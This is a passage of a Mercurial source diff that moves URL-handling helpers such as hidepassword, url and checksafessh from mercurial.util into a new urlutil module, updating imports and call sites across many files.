diff --git a/hgext/fetch.py b/hgext/fetch.py --- a/hgext/fetch.py +++ b/hgext/fetch.py @@ -19,9 +19,11 @@ lock, pycompat, registrar, - util, ) -from mercurial.utils import dateutil +from mercurial.utils import ( + dateutil, + urlutil, +) release = lock.release cmdtable = {} @@ -109,7 +111,8 @@ other = hg.peer(repo, opts, ui.expandpath(source)) ui.status( - _(b'pulling from %s\n') % util.hidepassword(ui.expandpath(source)) + _(b'pulling from %s\n') + % urlutil.hidepassword(ui.expandpath(source)) ) revs = None if opts[b'rev']: @@ -180,7 +183,7 @@ if not err: # we don't translate commit messages message = cmdutil.logmessage(ui, opts) or ( - b'Automated merge with %s' % util.removeauth(other.url()) + b'Automated merge with %s' % urlutil.removeauth(other.url()) ) editopt = opts.get(b'edit') or opts.get(b'force_editor') editor = cmdutil.getcommiteditor(edit=editopt, editform=b'fetch') diff --git a/hgext/histedit.py b/hgext/histedit.py --- a/hgext/histedit.py +++ b/hgext/histedit.py @@ -242,6 +242,7 @@ from mercurial.utils import ( dateutil, stringutil, + urlutil, ) pickle = util.pickle @@ -1042,7 +1043,7 @@ opts = {} dest = ui.expandpath(remote or b'default-push', remote or b'default') dest, branches = hg.parseurl(dest, None)[:2] - ui.status(_(b'comparing with %s\n') % util.hidepassword(dest)) + ui.status(_(b'comparing with %s\n') % urlutil.hidepassword(dest)) revs, checkout = hg.addbranchrevs(repo, repo, branches, None) other = hg.peer(repo, opts, dest) diff --git a/hgext/largefiles/basestore.py b/hgext/largefiles/basestore.py --- a/hgext/largefiles/basestore.py +++ b/hgext/largefiles/basestore.py @@ -12,6 +12,9 @@ from mercurial.i18n import _ from mercurial import node, util +from mercurial.utils import ( + urlutil, +) from . import lfutil @@ -29,13 +32,13 @@ def longmessage(self): return _(b"error getting id %s from url %s for file %s: %s\n") % ( self.hash, - util.hidepassword(self.url), + urlutil.hidepassword(self.url), self.filename, self.detail, ) def __str__(self): - return b"%s: %s" % (util.hidepassword(self.url), self.detail) + return b"%s: %s" % (urlutil.hidepassword(self.url), self.detail) class basestore(object): @@ -79,7 +82,7 @@ if not available.get(hash): ui.warn( _(b'%s: largefile %s not available from %s\n') - % (filename, hash, util.hidepassword(self.url)) + % (filename, hash, urlutil.hidepassword(self.url)) ) missing.append(filename) continue diff --git a/hgext/largefiles/remotestore.py b/hgext/largefiles/remotestore.py --- a/hgext/largefiles/remotestore.py +++ b/hgext/largefiles/remotestore.py @@ -15,7 +15,10 @@ util, ) -from mercurial.utils import stringutil +from mercurial.utils import ( + stringutil, + urlutil, +) from . import ( basestore, @@ -40,11 +43,11 @@ if self.sendfile(source, hash): raise error.Abort( _(b'remotestore: could not put %s to remote store %s') - % (source, util.hidepassword(self.url)) + % (source, urlutil.hidepassword(self.url)) ) self.ui.debug( _(b'remotestore: put %s to remote store %s\n') - % (source, util.hidepassword(self.url)) + % (source, urlutil.hidepassword(self.url)) ) def exists(self, hashes): @@ -80,7 +83,7 @@ # keep trying with the other files... they will probably # all fail too. raise error.Abort( - b'%s: %s' % (util.hidepassword(self.url), e.reason) + b'%s: %s' % (urlutil.hidepassword(self.url), e.reason) ) except IOError as e: raise basestore.StoreError( diff --git a/hgext/largefiles/storefactory.py b/hgext/largefiles/storefactory.py --- a/hgext/largefiles/storefactory.py +++ b/hgext/largefiles/storefactory.py @@ -12,6 +12,9 @@ hg, util, ) +from mercurial.utils import ( + urlutil, +) from . import ( lfutil, @@ -71,7 +74,7 @@ raise error.Abort( _(b'%s does not appear to be a largefile store') - % util.hidepassword(path) + % urlutil.hidepassword(path) ) diff --git a/hgext/lfs/blobstore.py b/hgext/lfs/blobstore.py --- a/hgext/lfs/blobstore.py +++ b/hgext/lfs/blobstore.py @@ -31,7 +31,10 @@ worker, ) -from mercurial.utils import stringutil +from mercurial.utils import ( + stringutil, + urlutil, +) from ..largefiles import lfutil @@ -725,7 +728,7 @@ https://github.com/git-lfs/git-lfs/blob/master/docs/api/server-discovery.md """ lfsurl = repo.ui.config(b'lfs', b'url') - url = util.url(lfsurl or b'') + url = urlutil.url(lfsurl or b'') if lfsurl is None: if remote: path = remote @@ -739,7 +742,7 @@ # and fall back to inferring from 'paths.remote' if unspecified. path = repo.ui.config(b'paths', b'default') or b'' - defaulturl = util.url(path) + defaulturl = urlutil.url(path) # TODO: support local paths as well. # TODO: consider the ssh -> https transformation that git applies @@ -748,7 +751,7 @@ defaulturl.path += b'/' defaulturl.path = (defaulturl.path or b'') + b'.git/info/lfs' - url = util.url(bytes(defaulturl)) + url = urlutil.url(bytes(defaulturl)) repo.ui.note(_(b'lfs: assuming remote store: %s\n') % url) scheme = url.scheme diff --git a/hgext/mq.py b/hgext/mq.py --- a/hgext/mq.py +++ b/hgext/mq.py @@ -108,6 +108,7 @@ from mercurial.utils import ( dateutil, stringutil, + urlutil, ) release = lockmod.release @@ -2509,7 +2510,7 @@ ) filename = normname(filename) self.checkreservedname(filename) - if util.url(filename).islocal(): + if urlutil.url(filename).islocal(): originpath = self.join(filename) if not os.path.isfile(originpath): raise error.Abort( diff --git a/hgext/narrow/narrowcommands.py b/hgext/narrow/narrowcommands.py --- a/hgext/narrow/narrowcommands.py +++ b/hgext/narrow/narrowcommands.py @@ -36,6 +36,9 @@ util, wireprototypes, ) +from mercurial.utils import ( + urlutil, +) table = {} command = registrar.command(table) @@ -592,7 +595,7 @@ # also define the set of revisions to update for widening. remotepath = ui.expandpath(remotepath or b'default') url, branches = hg.parseurl(remotepath) - ui.status(_(b'comparing with %s\n') % util.hidepassword(url)) + ui.status(_(b'comparing with %s\n') % urlutil.hidepassword(url)) remote = hg.peer(repo, opts, url) try: diff --git a/hgext/patchbomb.py b/hgext/patchbomb.py --- a/hgext/patchbomb.py +++ b/hgext/patchbomb.py @@ -99,7 +99,10 @@ templater, util, ) -from mercurial.utils import dateutil +from mercurial.utils import ( + dateutil, + urlutil, +) stringio = util.stringio @@ -529,7 +532,7 @@ ui = repo.ui url = ui.expandpath(dest or b'default-push', dest or b'default') url = hg.parseurl(url)[0] - ui.status(_(b'comparing with %s\n') % util.hidepassword(url)) + ui.status(_(b'comparing with %s\n') % urlutil.hidepassword(url)) revs = [r for r in revs if r >= 0] if not revs: diff --git a/hgext/phabricator.py b/hgext/phabricator.py --- a/hgext/phabricator.py +++ b/hgext/phabricator.py @@ -103,6 +103,7 @@ from mercurial.utils import ( procutil, stringutil, + urlutil, ) from . import show @@ -366,7 +367,7 @@ process(k, v) process(b'', params) - return util.urlreq.urlencode(flatparams) + return urlutil.urlreq.urlencode(flatparams) def readurltoken(ui): @@ -381,7 +382,7 @@ _(b'config %s.%s is required') % (b'phabricator', b'url') ) - res = httpconnectionmod.readauthforuri(ui, url, util.url(url).user) + res = httpconnectionmod.readauthforuri(ui, url, urlutil.url(url).user) token = None if res: diff --git a/hgext/schemes.py b/hgext/schemes.py --- a/hgext/schemes.py +++ b/hgext/schemes.py @@ -52,7 +52,9 @@ pycompat, registrar, templater, - util, +) +from mercurial.utils import ( + urlutil, ) cmdtable = {} @@ -86,7 +88,7 @@ ) def resolve(self, url): - # Should this use the util.url class, or is manual parsing better? + # Should this use the urlutil.url class, or is manual parsing better? try: url = url.split(b'://', 1)[1] except IndexError: @@ -137,7 +139,7 @@ ) hg.schemes[scheme] = ShortRepository(url, scheme, t) - extensions.wrapfunction(util, b'hasdriveletter', hasdriveletter) + extensions.wrapfunction(urlutil, b'hasdriveletter', hasdriveletter) @command(b'debugexpandscheme', norepo=True) diff --git a/mercurial/bookmarks.py b/mercurial/bookmarks.py --- a/mercurial/bookmarks.py +++ b/mercurial/bookmarks.py @@ -27,6 +27,9 @@ txnutil, util, ) +from .utils import ( + urlutil, +) # label constants # until 3.5, bookmarks.current was the advertised name, not @@ -597,10 +600,10 @@ # try to use an @pathalias suffix # if an @pathalias already exists, we overwrite (update) it if path.startswith(b"file:"): - path = util.url(path).path + path = urlutil.url(path).path for p, u in ui.configitems(b"paths"): if u.startswith(b"file:"): - u = util.url(u).path + u = urlutil.url(u).path if path == u: return b'%s@%s' % (b, p) diff --git a/mercurial/bundle2.py b/mercurial/bundle2.py --- a/mercurial/bundle2.py +++ b/mercurial/bundle2.py @@ -177,7 +177,10 @@ url, util, ) -from .utils import stringutil +from .utils import ( + stringutil, + urlutil, +) urlerr = util.urlerr urlreq = util.urlreq @@ -2073,7 +2076,7 @@ raw_url = inpart.params[b'url'] except KeyError: raise error.Abort(_(b'remote-changegroup: missing "%s" param') % b'url') - parsed_url = util.url(raw_url) + parsed_url = urlutil.url(raw_url) if parsed_url.scheme not in capabilities[b'remote-changegroup']: raise error.Abort( _(b'remote-changegroup does not support %s urls') @@ -2110,7 +2113,7 @@ cg = exchange.readbundle(op.repo.ui, real_part, raw_url) if not isinstance(cg, changegroup.cg1unpacker): raise error.Abort( - _(b'%s: not a bundle version 1.0') % util.hidepassword(raw_url) + _(b'%s: not a bundle version 1.0') % urlutil.hidepassword(raw_url) ) ret = _processchangegroup(op, cg, tr, op.source, b'bundle2') if op.reply is not None: @@ -2126,7 +2129,7 @@ except error.Abort as e: raise error.Abort( _(b'bundle at %s is corrupted:\n%s') - % (util.hidepassword(raw_url), e.message) + % (urlutil.hidepassword(raw_url), e.message) ) assert not inpart.read() diff --git a/mercurial/bundlerepo.py b/mercurial/bundlerepo.py --- a/mercurial/bundlerepo.py +++ b/mercurial/bundlerepo.py @@ -43,6 +43,9 @@ util, vfs as vfsmod, ) +from .utils import ( + urlutil, +) class bundlerevlog(revlog.revlog): @@ -475,7 +478,7 @@ cwd = pathutil.normasprefix(cwd) if parentpath.startswith(cwd): parentpath = parentpath[len(cwd) :] - u = util.url(path) + u = urlutil.url(path) path = u.localpath() if u.scheme == b'bundle': s = path.split(b"+", 1) diff --git a/mercurial/commands.py b/mercurial/commands.py --- a/mercurial/commands.py +++ b/mercurial/commands.py @@ -74,6 +74,7 @@ from .utils import ( dateutil, stringutil, + urlutil, ) if pycompat.TYPE_CHECKING: @@ -4318,7 +4319,7 @@ ui.warn(_(b"remote doesn't support bookmarks\n")) return 0 ui.pager(b'incoming') - ui.status(_(b'comparing with %s\n') % util.hidepassword(source)) + ui.status(_(b'comparing with %s\n') % urlutil.hidepassword(source)) return bookmarks.incoming(ui, repo, other) finally: other.close() @@ -4993,7 +4994,7 @@ if b'bookmarks' not in other.listkeys(b'namespaces'): ui.warn(_(b"remote doesn't support bookmarks\n")) return 0 - ui.status(_(b'comparing with %s\n') % util.hidepassword(dest)) + ui.status(_(b'comparing with %s\n') % urlutil.hidepassword(dest)) ui.pager(b'outgoing') return bookmarks.outgoing(ui, repo, other) finally: @@ -5141,7 +5142,7 @@ fm = ui.formatter(b'paths', opts) if fm.isplain(): - hidepassword = util.hidepassword + hidepassword = urlutil.hidepassword else: hidepassword = bytes if ui.quiet: @@ -5391,7 +5392,7 @@ source, branches = hg.parseurl( ui.expandpath(source), opts.get(b'branch') ) - ui.status(_(b'pulling from %s\n') % util.hidepassword(source)) + ui.status(_(b'pulling from %s\n') % urlutil.hidepassword(source)) ui.flush() other = hg.peer(repo, opts, source) update_conflict = None @@ -5731,7 +5732,7 @@ ) dest = path.pushloc or path.loc branches = (path.branch, opts.get(b'branch') or []) - ui.status(_(b'pushing to %s\n') % util.hidepassword(dest)) + ui.status(_(b'pushing to %s\n') % urlutil.hidepassword(dest)) revs, checkout = hg.addbranchrevs( repo, repo, branches, opts.get(b'rev') ) @@ -7228,7 +7229,7 @@ revs, checkout = hg.addbranchrevs(repo, other, branches, None) if revs: revs = [other.lookup(rev) for rev in revs] - ui.debug(b'comparing with %s\n' % util.hidepassword(source)) + ui.debug(b'comparing with %s\n' % urlutil.hidepassword(source)) repo.ui.pushbuffer() commoninc = discovery.findcommonincoming(repo, other, heads=revs) repo.ui.popbuffer() @@ -7250,7 +7251,7 @@ if opts.get(b'remote'): raise return dest, dbranch, None, None - ui.debug(b'comparing with %s\n' % util.hidepassword(dest)) + ui.debug(b'comparing with %s\n' % urlutil.hidepassword(dest)) elif sother is None: # there is no explicit destination peer, but source one is invalid return dest, dbranch, None, None @@ -7592,7 +7593,7 @@ try: txnname = b'unbundle' if not isinstance(gen, bundle2.unbundle20): - txnname = b'unbundle\n%s' % util.hidepassword(url) + txnname = b'unbundle\n%s' % urlutil.hidepassword(url) with repo.transaction(txnname) as tr: op = bundle2.applybundle( repo, gen, tr, source=b'unbundle', url=url diff --git a/mercurial/debugcommands.py b/mercurial/debugcommands.py --- a/mercurial/debugcommands.py +++ b/mercurial/debugcommands.py @@ -98,6 +98,7 @@ dateutil, procutil, stringutil, + urlutil, ) from .revlogutils import ( @@ -1061,7 +1062,7 @@ remoteurl, branches = hg.parseurl(ui.expandpath(remoteurl)) remote = hg.peer(repo, opts, remoteurl) - ui.status(_(b'comparing with %s\n') % util.hidepassword(remoteurl)) + ui.status(_(b'comparing with %s\n') % urlutil.hidepassword(remoteurl)) else: branches = (None, []) remote_filtered_revs = scmutil.revrange( @@ -3652,7 +3653,7 @@ source = b"default" source, branches = hg.parseurl(ui.expandpath(source)) - url = util.url(source) + url = urlutil.url(source) defaultport = {b'https': 443, b'ssh': 22} if url.scheme in defaultport: @@ -4525,7 +4526,7 @@ # We bypass hg.peer() so we can proxy the sockets. # TODO consider not doing this because we skip # ``hg.wirepeersetupfuncs`` and potentially other useful functionality. - u = util.url(path) + u = urlutil.url(path) if u.scheme != b'http': raise error.Abort(_(b'only http:// paths are currently supported')) diff --git a/mercurial/exchange.py b/mercurial/exchange.py --- a/mercurial/exchange.py +++ b/mercurial/exchange.py @@ -42,6 +42,7 @@ from .utils import ( hashutil, stringutil, + urlutil, ) urlerr = util.urlerr @@ -1465,7 +1466,7 @@ def transaction(self): """Return an open transaction object, constructing if necessary""" if not self._tr: - trname = b'%s\n%s' % (self.source, util.hidepassword(self.url)) + trname = b'%s\n%s' % (self.source, urlutil.hidepassword(self.url)) self._tr = self.repo.transaction(trname) self._tr.hookargs[b'source'] = self.source self._tr.hookargs[b'url'] = self.url @@ -2647,7 +2648,7 @@ # push can proceed if not isinstance(cg, bundle2.unbundle20): # legacy case: bundle1 (changegroup 01) - txnname = b"\n".join([source, util.hidepassword(url)]) + txnname = b"\n".join([source, urlutil.hidepassword(url)]) with repo.lock(), repo.transaction(txnname) as tr: op = bundle2.applybundle(repo, cg, tr, source, url) r = bundle2.combinechangegroupresults(op) diff --git a/mercurial/hg.py b/mercurial/hg.py --- a/mercurial/hg.py +++ b/mercurial/hg.py @@ -55,6 +55,7 @@ from .utils import ( hashutil, stringutil, + urlutil, ) @@ -65,7 +66,7 @@ def _local(path): - path = util.expandpath(util.urllocalpath(path)) + path = util.expandpath(urlutil.urllocalpath(path)) try: # we use os.stat() directly here instead of os.path.isfile() @@ -132,7 +133,7 @@ def parseurl(path, branches=None): '''parse url#branch, returning (url, (branch, branches))''' - u = util.url(path) + u = urlutil.url(path) branch = None if u.fragment: branch = u.fragment @@ -152,7 +153,7 @@ def _peerlookup(path): - u = util.url(path) + u = urlutil.url(path) scheme = u.scheme or b'file' thing = schemes.get(scheme) or schemes[b'file'] try: @@ -177,7 +178,7 @@ def openpath(ui, path, sendaccept=True): '''open path with open if local, url.open if remote''' - pathurl = util.url(path, parsequery=False, parsefragment=False) + pathurl = urlutil.url(path, parsequery=False, parsefragment=False) if pathurl.islocal(): return util.posixfile(pathurl.localpath(), b'rb') else: @@ -265,7 +266,7 @@ >>> defaultdest(b'http://example.org/foo/') 'foo' """ - path = util.url(source).path + path = urlutil.url(source).path if not path: return b'' return os.path.basename(os.path.normpath(path)) @@ -571,7 +572,7 @@ # Resolve the value to put in [paths] section for the source. if islocal(source): - defaultpath = os.path.abspath(util.urllocalpath(source)) + defaultpath = os.path.abspath(urlutil.urllocalpath(source)) else: defaultpath = source @@ -693,8 +694,8 @@ else: dest = ui.expandpath(dest) - dest = util.urllocalpath(dest) - source = util.urllocalpath(source) + dest = urlutil.urllocalpath(dest) + source = urlutil.urllocalpath(source) if not dest: raise error.InputError(_(b"empty destination path is not valid")) @@ -825,7 +826,7 @@ abspath = origsource if islocal(origsource): - abspath = os.path.abspath(util.urllocalpath(origsource)) + abspath = os.path.abspath(urlutil.urllocalpath(origsource)) if islocal(dest): cleandir = dest @@ -939,7 +940,7 @@ local.setnarrowpats(storeincludepats, storeexcludepats) narrowspec.copytoworkingcopy(local) - u = util.url(abspath) + u = urlutil.url(abspath) defaulturl = bytes(u) local.ui.setconfig(b'paths', b'default', defaulturl, b'clone') if not stream: @@ -986,7 +987,7 @@ destrepo = destpeer.local() if destrepo: template = uimod.samplehgrcs[b'cloned'] - u = util.url(abspath) + u = urlutil.url(abspath) u.passwd = None defaulturl = bytes(u) destrepo.vfs.write(b'hgrc', util.tonativeeol(template % defaulturl)) @@ -1269,7 +1270,7 @@ other = peer(repo, opts, source) cleanupfn = other.close try: - ui.status(_(b'comparing with %s\n') % util.hidepassword(source)) + ui.status(_(b'comparing with %s\n') % urlutil.hidepassword(source)) revs, checkout = addbranchrevs(repo, other, branches, opts.get(b'rev')) if revs: @@ -1330,7 +1331,7 @@ dest = path.pushloc or path.loc branches = path.branch, opts.get(b'branch') or [] - ui.status(_(b'comparing with %s\n') % util.hidepassword(dest)) + ui.status(_(b'comparing with %s\n') % urlutil.hidepassword(dest)) revs, checkout = addbranchrevs(repo, repo, branches, opts.get(b'rev')) if revs: revs = [repo[rev].node() for rev in scmutil.revrange(repo, revs)] diff --git a/mercurial/hgweb/request.py b/mercurial/hgweb/request.py --- a/mercurial/hgweb/request.py +++ b/mercurial/hgweb/request.py @@ -17,6 +17,9 @@ pycompat, util, ) +from ..utils import ( + urlutil, +) class multidict(object): @@ -184,7 +187,7 @@ reponame = env.get(b'REPO_NAME') if altbaseurl: - altbaseurl = util.url(altbaseurl) + altbaseurl = urlutil.url(altbaseurl) # https://www.python.org/dev/peps/pep-0333/#environ-variables defines # the environment variables. diff --git a/mercurial/hgweb/server.py b/mercurial/hgweb/server.py --- a/mercurial/hgweb/server.py +++ b/mercurial/hgweb/server.py @@ -28,6 +28,9 @@ pycompat, util, ) +from ..utils import ( + urlutil, +) httpservermod = util.httpserver socketserver = util.socketserver @@ -431,7 +434,7 @@ sys.setdefaultencoding(oldenc) address = ui.config(b'web', b'address') - port = util.getport(ui.config(b'web', b'port')) + port = urlutil.getport(ui.config(b'web', b'port')) try: return cls(ui, app, (address, port), handler) except socket.error as inst: diff --git a/mercurial/httpconnection.py b/mercurial/httpconnection.py --- a/mercurial/httpconnection.py +++ b/mercurial/httpconnection.py @@ -18,6 +18,10 @@ pycompat, util, ) +from .utils import ( + urlutil, +) + urlerr = util.urlerr urlreq = util.urlreq @@ -99,7 +103,7 @@ if not prefix: continue - prefixurl = util.url(prefix) + prefixurl = urlutil.url(prefix) if prefixurl.user and prefixurl.user != user: # If a username was set in the prefix, it must match the username in # the URI. diff --git a/mercurial/httppeer.py b/mercurial/httppeer.py --- a/mercurial/httppeer.py +++ b/mercurial/httppeer.py @@ -38,6 +38,7 @@ from .utils import ( cborutil, stringutil, + urlutil, ) httplib = util.httplib @@ -305,7 +306,7 @@ except httplib.HTTPException as inst: ui.debug( b'http error requesting %s\n' - % util.hidepassword(req.get_full_url()) + % urlutil.hidepassword(req.get_full_url()) ) ui.traceback() raise IOError(None, inst) @@ -352,14 +353,14 @@ except AttributeError: proto = pycompat.bytesurl(resp.headers.get('content-type', '')) - safeurl = util.hidepassword(baseurl) + safeurl = urlutil.hidepassword(baseurl) if proto.startswith(b'application/hg-error'): raise error.OutOfBandError(resp.read()) # Pre 1.0 versions of Mercurial used text/plain and # application/hg-changegroup. We don't support such old servers. if not proto.startswith(b'application/mercurial-'): - ui.debug(b"requested URL: '%s'\n" % util.hidepassword(requrl)) + ui.debug(b"requested URL: '%s'\n" % urlutil.hidepassword(requrl)) msg = _( b"'%s' does not appear to be an hg repository:\n" b"---%%<--- (%s)\n%s\n---%%<---\n" @@ -1058,7 +1059,7 @@ ``requestbuilder`` is the type used for constructing HTTP requests. It exists as an argument so extensions can override the default. """ - u = util.url(path) + u = urlutil.url(path) if u.query or u.fragment: raise error.Abort( _(b'unsupported URL component: "%s"') % (u.query or u.fragment) diff --git a/mercurial/localrepo.py b/mercurial/localrepo.py --- a/mercurial/localrepo.py +++ b/mercurial/localrepo.py @@ -84,6 +84,7 @@ hashutil, procutil, stringutil, + urlutil, ) from .revlogutils import ( @@ -3401,7 +3402,7 @@ def instance(ui, path, create, intents=None, createopts=None): - localpath = util.urllocalpath(path) + localpath = urlutil.urllocalpath(path) if create: createrepository(ui, localpath, createopts=createopts) diff --git a/mercurial/logexchange.py b/mercurial/logexchange.py --- a/mercurial/logexchange.py +++ b/mercurial/logexchange.py @@ -15,6 +15,9 @@ util, vfs as vfsmod, ) +from .utils import ( + urlutil, +) # directory name in .hg/ in which remotenames files will be present remotenamedir = b'logexchange' @@ -117,7 +120,7 @@ # represent the remotepath with user defined path name if exists for path, url in repo.ui.configitems(b'paths'): # remove auth info from user defined url - noauthurl = util.removeauth(url) + noauthurl = urlutil.removeauth(url) # Standardize on unix style paths, otherwise some {remotenames} end up # being an absolute path on Windows. diff --git a/mercurial/mail.py b/mercurial/mail.py --- a/mercurial/mail.py +++ b/mercurial/mail.py @@ -34,6 +34,7 @@ from .utils import ( procutil, stringutil, + urlutil, ) if pycompat.TYPE_CHECKING: @@ -139,7 +140,7 @@ defaultport = 465 else: defaultport = 25 - mailport = util.getport(ui.config(b'smtp', b'port', defaultport)) + mailport = urlutil.getport(ui.config(b'smtp', b'port', defaultport)) ui.note(_(b'sending mail: smtp host %s, port %d\n') % (mailhost, mailport)) s.connect(host=mailhost, port=mailport) if starttls: diff --git a/mercurial/repair.py b/mercurial/repair.py --- a/mercurial/repair.py +++ b/mercurial/repair.py @@ -28,11 +28,11 @@ pycompat, requirements, scmutil, - util, ) from .utils import ( hashutil, stringutil, + urlutil, ) @@ -245,7 +245,7 @@ tmpbundleurl = b'bundle:' + vfs.join(tmpbundlefile) txnname = b'strip' if not isinstance(gen, bundle2.unbundle20): - txnname = b"strip\n%s" % util.hidepassword(tmpbundleurl) + txnname = b"strip\n%s" % urlutil.hidepassword(tmpbundleurl) with repo.transaction(txnname) as tr: bundle2.applybundle( repo, gen, tr, source=b'strip', url=tmpbundleurl diff --git a/mercurial/server.py b/mercurial/server.py --- a/mercurial/server.py +++ b/mercurial/server.py @@ -22,7 +22,10 @@ util, ) -from .utils import procutil +from .utils import ( + procutil, + urlutil, +) def runservice( @@ -184,7 +187,7 @@ def _createhgwebservice(ui, repo, opts): # this way we can check if something was given in the command-line if opts.get(b'port'): - opts[b'port'] = util.getport(opts.get(b'port')) + opts[b'port'] = urlutil.getport(opts.get(b'port')) alluis = {ui} if repo: diff --git a/mercurial/sshpeer.py b/mercurial/sshpeer.py --- a/mercurial/sshpeer.py +++ b/mercurial/sshpeer.py @@ -24,6 +24,7 @@ from .utils import ( procutil, stringutil, + urlutil, ) @@ -662,11 +663,11 @@ The returned object conforms to the ``wireprotov1peer.wirepeer`` interface. """ - u = util.url(path, parsequery=False, parsefragment=False) + u = urlutil.url(path, parsequery=False, parsefragment=False) if u.scheme != b'ssh' or not u.host or u.path is None: raise error.RepoError(_(b"couldn't parse location %s") % path) - util.checksafessh(path) + urlutil.checksafessh(path) if u.passwd is not None: raise error.RepoError(_(b'password in URL not supported')) diff --git a/mercurial/statichttprepo.py b/mercurial/statichttprepo.py --- a/mercurial/statichttprepo.py +++ b/mercurial/statichttprepo.py @@ -26,6 +26,9 @@ util, vfs as vfsmod, ) +from .utils import ( + urlutil, +) urlerr = util.urlerr urlreq = util.urlreq @@ -162,7 +165,7 @@ self.ui = ui self.root = path - u = util.url(path.rstrip(b'/') + b"/.hg") + u = urlutil.url(path.rstrip(b'/') + b"/.hg") self.path, authinfo = u.authinfo() vfsclass = build_opener(ui, authinfo) diff --git a/mercurial/subrepo.py b/mercurial/subrepo.py --- a/mercurial/subrepo.py +++ b/mercurial/subrepo.py @@ -44,6 +44,7 @@ dateutil, hashutil, procutil, + urlutil, ) hg = None @@ -57,8 +58,8 @@ """ get a path or url and if it is a path expand it and return an absolute path """ - expandedpath = util.urllocalpath(util.expandpath(path)) - u = util.url(expandedpath) + expandedpath = urlutil.urllocalpath(util.expandpath(path)) + u = urlutil.url(expandedpath) if not u.scheme: path = util.normpath(os.path.abspath(u.path)) return path @@ -745,7 +746,7 @@ self.ui.status( _(b'cloning subrepo %s from %s\n') - % (subrelpath(self), util.hidepassword(srcurl)) + % (subrelpath(self), urlutil.hidepassword(srcurl)) ) peer = getpeer() try: @@ -765,7 +766,7 @@ else: self.ui.status( _(b'pulling subrepo %s from %s\n') - % (subrelpath(self), util.hidepassword(srcurl)) + % (subrelpath(self), urlutil.hidepassword(srcurl)) ) cleansub = self.storeclean(srcurl) peer = getpeer() @@ -849,12 +850,12 @@ if self.storeclean(dsturl): self.ui.status( _(b'no changes made to subrepo %s since last push to %s\n') - % (subrelpath(self), util.hidepassword(dsturl)) + % (subrelpath(self), urlutil.hidepassword(dsturl)) ) return None self.ui.status( _(b'pushing subrepo %s to %s\n') - % (subrelpath(self), util.hidepassword(dsturl)) + % (subrelpath(self), urlutil.hidepassword(dsturl)) ) other = hg.peer(self._repo, {b'ssh': ssh}, dsturl) try: @@ -1284,7 +1285,7 @@ args.append(b'%s@%s' % (state[0], state[1])) # SEC: check that the ssh url is safe - util.checksafessh(state[0]) + urlutil.checksafessh(state[0]) status, err = self._svncommand(args, failok=True) _sanitize(self.ui, self.wvfs, b'.svn') @@ -1582,7 +1583,7 @@ def _fetch(self, source, revision): if self._gitmissing(): # SEC: check for safe ssh url - util.checksafessh(source) + urlutil.checksafessh(source) source = self._abssource(source) self.ui.status( diff --git a/mercurial/subrepoutil.py b/mercurial/subrepoutil.py --- a/mercurial/subrepoutil.py +++ b/mercurial/subrepoutil.py @@ -23,7 +23,10 @@ pycompat, util, ) -from .utils import stringutil +from .utils import ( + stringutil, + urlutil, +) nullstate = (b'', b'', b'empty') @@ -136,10 +139,10 @@ kind = kind[1:] src = src.lstrip() # strip any extra whitespace after ']' - if not util.url(src).isabs(): + if not urlutil.url(src).isabs(): parent = _abssource(repo, abort=False) if parent: - parent = util.url(parent) + parent = urlutil.url(parent) parent.path = posixpath.join(parent.path or b'', src) parent.path = posixpath.normpath(parent.path) joined = bytes(parent) @@ -400,13 +403,13 @@ """return pull/push path of repo - either based on parent repo .hgsub info or on the top repo config. Abort or return None if no source found.""" if util.safehasattr(repo, b'_subparent'): - source = util.url(repo._subsource) + source = urlutil.url(repo._subsource) if source.isabs(): return bytes(source) source.path = posixpath.normpath(source.path) parent = _abssource(repo._subparent, push, abort=False) if parent: - parent = util.url(util.pconvert(parent)) + parent = urlutil.url(util.pconvert(parent)) parent.path = posixpath.join(parent.path or b'', source.path) parent.path = posixpath.normpath(parent.path) return bytes(parent) @@ -435,7 +438,7 @@ # # D:\>python -c "import os; print os.path.abspath('C:relative')" # C:\some\path\relative - if util.hasdriveletter(path): + if urlutil.hasdriveletter(path): if len(path) == 2 or path[2:3] not in br'\/': path = os.path.abspath(path) return path diff --git a/mercurial/ui.py b/mercurial/ui.py --- a/mercurial/ui.py +++ b/mercurial/ui.py @@ -559,7 +559,7 @@ ) p = p.replace(b'%%', b'%') p = util.expandpath(p) - if not util.hasscheme(p) and not os.path.isabs(p): + if not urlutil.hasscheme(p) and not os.path.isabs(p): p = os.path.normpath(os.path.join(root, p)) c.alter(b"paths", n, p) diff --git a/mercurial/url.py b/mercurial/url.py --- a/mercurial/url.py +++ b/mercurial/url.py @@ -26,7 +26,10 @@ urllibcompat, util, ) -from .utils import stringutil +from .utils import ( + stringutil, + urlutil, +) httplib = util.httplib stringio = util.stringio @@ -75,17 +78,17 @@ user, passwd = auth.get(b'username'), auth.get(b'password') self.ui.debug(b"using auth.%s.* for authentication\n" % group) if not user or not passwd: - u = util.url(pycompat.bytesurl(authuri)) + u = urlutil.url(pycompat.bytesurl(authuri)) u.query = None if not self.ui.interactive(): raise error.Abort( _(b'http authorization required for %s') - % util.hidepassword(bytes(u)) + % urlutil.hidepassword(bytes(u)) ) self.ui.write( _(b"http authorization required for %s\n") - % util.hidepassword(bytes(u)) + % urlutil.hidepassword(bytes(u)) ) self.ui.write(_(b"realm: %s\n") % pycompat.bytesurl(realm)) if user: @@ -128,7 +131,7 @@ proxyurl.startswith(b'http:') or proxyurl.startswith(b'https:') ): proxyurl = b'http://' + proxyurl + b'/' - proxy = util.url(proxyurl) + proxy = urlutil.url(proxyurl) if not proxy.user: proxy.user = ui.config(b"http_proxy", b"user") proxy.passwd = ui.config(b"http_proxy", b"passwd") @@ -155,7 +158,9 @@ # expects them to be. proxyurl = str(proxy) proxies = {'http': proxyurl, 'https': proxyurl} - ui.debug(b'proxying through %s\n' % util.hidepassword(bytes(proxy))) + ui.debug( + b'proxying through %s\n' % urlutil.hidepassword(bytes(proxy)) + ) else: proxies = {} @@ -219,7 +224,7 @@ new_tunnel = False if new_tunnel or tunnel_host == urllibcompat.getfullurl(req): # has proxy - u = util.url(pycompat.bytesurl(tunnel_host)) + u = urlutil.url(pycompat.bytesurl(tunnel_host)) if new_tunnel or u.scheme == b'https': # only use CONNECT for HTTPS h.realhostport = b':'.join([u.host, (u.port or b'443')]) h.headers = req.headers.copy() @@ -675,7 +680,7 @@ def open(ui, url_, data=None, sendaccept=True): - u = util.url(url_) + u = urlutil.url(url_) if u.scheme: u.scheme = u.scheme.lower() url_, authinfo = u.authinfo() diff --git a/mercurial/util.py b/mercurial/util.py --- a/mercurial/util.py +++ b/mercurial/util.py @@ -28,7 +28,6 @@ import platform as pyplatform import re as remod import shutil -import socket import stat import sys import time @@ 